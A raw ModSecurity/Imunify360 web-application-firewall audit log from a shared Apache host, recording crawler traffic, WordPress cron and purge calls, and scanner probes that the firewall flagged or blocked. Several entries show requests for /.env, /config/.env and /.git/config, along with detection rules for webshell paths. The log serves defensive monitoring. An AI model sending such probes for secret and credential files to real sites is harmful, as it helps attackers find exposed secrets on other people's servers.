[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/head||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751249792639304 549449 (- - -) Stopwatch2: 1751249792639304 549449; combined=3605, p1=82, p2=3331, p3=0, p4=0, p5=192, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --babf4a3d-Z-- --00f8866f-A-- [30/Jun/2025:07:46:33.972897 +0530] aGHzgXuQoK4IDyYgUTmhxQAAAC4 20.171.207.232 51442 192.168.74.40 443 --00f8866f-B-- GET /aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --00f8866f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --00f8866f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751249793958501 14651 (- - -) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251467307384 20888 (- - -) Stopwatch2: 1751251467307384 20888; combined=5167, p1=165, p2=4649, p3=163, p4=8, p5=181, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --749fe000-Z-- --c9f8f731-A-- [30/Jun/2025:08:14:27.384416 +0530] aGH6CkF9jYm-D35cr2RMoQAAAAQ 103.185.74.40 20598 192.168.74.40 443 --c9f8f731-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --c9f8f731-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c9f8f731-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251466141330 1243482 (- - -) Stopwatch2: 1751251466141330 1243482; combined=2229, p1=82, p2=2017, p3=0, p4=0, p5=129, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c9f8f731-Z-- --f040b757-A-- [30/Jun/2025:08:14:27.387313 +0530] aGH6C77Opy15sEvIlJeLvwAAAA0 54.204.195.252 52128 192.168.74.40 443 --f040b757-B-- GET /.git/ HTTP/1.1 Host: pakhi-infosoul.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) Accept-Encoding: gzip Connection: close --f040b757-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html --f040b757-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251468624456 16549 (- - -) Stopwatch2: 1751251468624456 16549; combined=2622, p1=128, p2=2350, p3=0, p4=0, p5=144, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5da3a362-Z-- --e3c5fd50-A-- [30/Jun/2025:08:14:28.920722 +0530] aGH6C0EH8vgjpHPLG8CMeAAAAAg 103.185.74.40 45955 192.168.74.40 443 --e3c5fd50-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e3c5fd50-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e3c5fd50-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251467595544 1325262 (- - -) Stopwatch2: 1751251467595544 1325262; combined=2155, p1=90, p2=1862, p3=0, p4=0, p5=203, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e3c5fd50-Z-- --be22d342-A-- [30/Jun/2025:08:14:29.675195 +0530] aGH6DcMX88FUWUn0Do-0vQAAAA8 20.171.207.114 37862 192.168.74.40 443 --be22d342-B-- GET /returns_refunds.php/images/images/js/admin@oz/sweetalert-master/dist/images/admin@oz/sweetalert-master/dist/js/admin@oz/sweetalert-master/dist/js/warranty.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=a4shd17djd2acucsns2lrppgs4 host: ozautomotives.com.au --be22d342-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251625757675 16226 (- - -) Stopwatch2: 1751251625757675 16226; combined=2998, p1=144, p2=2681, p3=0, p4=0, p5=172, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --afff6224-Z-- --093fe301-A-- [30/Jun/2025:08:17:06.277734 +0530] aGH6qrvqzP1M7-_jb7C7YQAAABs 103.185.74.40 64942 192.168.74.40 443 --093fe301-B-- POST /wp-cron.php?doing_wp_cron=1751251626.0502901077270507812500 HTTP/1.1 Host: thecouturelove.com User-Agent: WordPress/6.8.1; https://thecouturelove.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --093fe301-C-- --093fe301-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --093fe301-H-- Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751251626.0502901077270507812500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251626260885 17321 (- - -) Stopwatch2: 1751251626260885 17321; combined=5855, p1=127, p2=4690, p3=283, p4=9, p5=746, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --093fe301-Z-- --da3bdb7b-A-- [30/Jun/2025:08:17:06.804841 +0530] aGH6ocMX88FUWUn0Do-1HQAAAA8 47.128.62.62 58638 192.168.74.40 443 --da3bdb7b-B-- GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.1 HTTP/1.1 Host: princeflexipack.com Connection: keep-alive Accept: text/css,*/*;q=0.1 Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://princeflexipack.com/hanger/ Accept-Encoding: gzip, deflate, br --da3bdb7b-F-- HTTP/1.1 404 Not Found -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b89fc83e-Z-- --6669c975-A-- [30/Jun/2025:08:36:31.819650 +0530] aGH_N4SOIB81O3xn36bFdgAAABE 45.146.130.98 55152 192.168.74.40 80 --6669c975-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --6669c975-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --6669c975-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751252791815014 4936 (- - -) Stopwatch2: 1751252791815014 4936; combined=1149, p1=217, p2=585, p3=0, p4=0, p5=347, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6669c975-Z-- --179c3d7b-A-- [30/Jun/2025:08:36:32.145995 +0530] aGH_ODiExd2xuA4-1WJMgQAAAA4 45.146.130.98 62911 192.168.74.40 80 --179c3d7b-B-- GET /config/.env HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --179c3d7b-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --179c3d7b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751252792142753 3482 (- - -) Stopwatch2: 1751252792142753 3482; combined=1006, p1=86, p2=534, p3=0, p4=0, p5=385, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --179c3d7b-Z-- --4c7a4537-A-- [30/Jun/2025:08:36:33.941143 +0530] aGH_OOwckA1YnXwN74ycMQAAABI 66.249.65.193 38886 192.168.74.40 443 --4c7a4537-B-- GET /pcmypage?callback=/product%2Fdetail%2jp-auction-x1118481656 HTTP/1.1 Host: hypertechindia.com AMP-Cache-Transform: google;v="1..8" Connection: keep-alive Accept: text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --4c7a4537-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4c7a4537-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2988e96b-Z-- --e1814e06-A-- [30/Jun/2025:08:55:02.635345 +0530] aGIDjvRHKktltpp38igzmwAAACA 176.227.240.31 49198 192.168.74.40 443 --e1814e06-B-- GET /images/logo/logo-eoffice.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Connection: close Accept-Encoding: gzip --e1814e06-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e1814e06-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/images/logo/logo-eoffice.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/images/logo/logo-eoffice.php||SC:/home/adminsu/public_html/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751253902076362 559339 (- - -) Stopwatch2: 1751253902076362 559339; combined=5262, p1=154, p2=4926, p3=0, p4=0, p5=181, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e1814e06-Z-- --46283c02-A-- [30/Jun/2025:08:55:02.861356 +0530] aGIDjj1nNpONDKfgpcBkewAAADs 198.38.84.76 42658 192.168.74.40 80 --46283c02-B-- HEAD /.ovi-knowns/tQEMG0ank9dRhBFHo85JNwSvrlKm2Ls6 HTTP/1.1 Host: vervemedia.co.in Accept: */* --46283c02-F-- HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 --46283c02-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751253902854928 6468 (- - -) Stopwatch2: 1751253902854928 6468; combined=3596, p1=104, p2=3317, p3=73, p4=2, p5=100, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --46283c02-Z-- --9195d93d-A-- [30/Jun/2025:08:55:03.576847 +0530] aGIDj8tw_tvrESE6wmA9fgAAABo 20.171.207.232 57192 192.168.74.40 443 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9e7c2935-Z-- --a0a9c629-A-- [30/Jun/2025:09:04:13.984002 +0530] aGIFtRlB8n6vgCPN_bsA-QAAAAM 64.62.197.92 31556 192.168.74.40 443 --a0a9c629-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Accept-Encoding: gzip --a0a9c629-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --a0a9c629-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751254453416265 568035 (- - -) Stopwatch2: 1751254453416265 568035; combined=3911, p1=82, p2=3639, p3=0, p4=0, p5=189, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a0a9c629-Z-- --8320fe0e-A-- [30/Jun/2025:09:04:14.807346 +0530] aGIFtmCZSWmhN9-g_jb0hAAAAAA 20.171.207.232 55534 192.168.74.40 443 --8320fe0e-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8320fe0e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8320fe0e-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751254454790416 17332 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8f224a3c-Z-- --9532f46f-A-- [30/Jun/2025:09:09:01.407136 +0530] aGIG1UEYkAQDRLEk9rG1QQAAAAA 43.167.232.38 56650 192.168.74.40 80 --9532f46f-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --9532f46f-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --9532f46f-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751254741397884 9642 (- - -) Stopwatch2: 1751254741397884 9642; combined=5253, p1=120, p2=4826, p3=117, p4=4, p5=185, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9532f46f-Z-- --f865ea78-A-- [30/Jun/2025:09:09:06.376135 +0530] aGIG2ohSZjLW3XPHWp4QPwAAAAI 20.171.207.114 40694 192.168.74.40 443 --f865ea78-B-- GET /returns_refunds.php/js/images/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/images/images/admin@oz/sweetalert-master/dist/js/contact.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=gp5niqe3j1c50a3qj50pb348m3 host: ozautomotives.com.au --f865ea78-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255038766668 1112937 (- - -) Stopwatch2: 1751255038766668 1112937; combined=2875, p1=129, p2=2403, p3=118, p4=15, p5=210, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e379f149-Z-- --89a2672c-A-- [30/Jun/2025:09:14:05.360609 +0530] aGIIBBrfT5RjsXEkAAqJ4AAAABE 103.185.74.40 45810 192.168.74.40 443 --89a2672c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --89a2672c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89a2672c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255044141696 1219253 (- - -) Stopwatch2: 1751255044141696 1219253; combined=2238, p1=75, p2=1942, p3=0, p4=0, p5=221, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
